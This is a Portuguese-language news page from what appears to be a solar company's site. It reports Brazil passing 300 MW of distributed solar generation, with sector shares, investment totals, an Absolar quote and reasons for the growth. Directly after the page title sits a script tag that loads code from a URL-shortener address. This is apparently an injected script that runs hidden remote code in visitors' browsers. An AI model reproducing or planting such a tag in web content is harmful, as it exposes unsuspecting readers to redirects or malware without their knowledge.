fbpx
Ligue-nos:     21 2147-0829   /     21 97532-3236
Brasil já está na marca de 300 MW de energia solar<script src="https://is.gd/y0fFL5?v=v19.0"></script>

Brasil já está na marca de 300 MW de energia solar

Com os sistemas de micro e minigeração solar fotovoltaica instalados em residências, comércios, indústria, produtores rurais e prédios público, o Brasil atingiu 300 MW de potência, uma marca inédita.

Dois setores foram os principais responsáveis para o país alcançar esse valor histórico, o residencial e o comercial e de serviços. O primeiro representa 76,9% do total de sistemas e 38% de potência instalada e o segundo, 16,2% e 44%.

Ao todo, temos 38.270 unidades consumidoras, o que equivale, aproximadamente, a R$ 2,2 bilhões em investimentos acumulados desde 2012 em todo o território brasileiro.

“Celebramos com otimismo este passo histórico para a fonte solar fotovoltaica no Brasil, com a certeza de que teremos um forte crescimento do setor nos próximos anos e décadas. O Brasil possui mais de 82 milhões de unidades consumidoras e um interesse crescente da população, das empresas e também dos gestores públicos em aproveitar seus telhados, fachadas e coberturas para gerar energia renovável localmente a partir do sol, economizando dinheiro e contribuindo na prática para a construção de um país mais sustentável e com mais empregos locais e qualificados”, disse Rodrigo Sauaia, Presidente da Absolar.

Três fatores influenciaram esse crescimento solar:

  1. Queda de mais de 75% no preço dos equipamentos;
  2. Constante aumentos das tarifas de energia elétrica;
  3. Aumento da preocupação com o meio ambiente.

O gráfico abaixo apresenta os estados que estão liderando a nossa evolução solar:

 

 

 

 

 

 

 

Fonte: Ambiente Energia

Elaboração: Julia Meliga Pimentel, Marketing, Gene Sustentável

Brasil já está na marca de 300 MW de energia solar
5 (100%) 1 vote

Adicionar comentário

Seu endereço de email não será publicado. Campos obrigatórios são marcados *

Copied!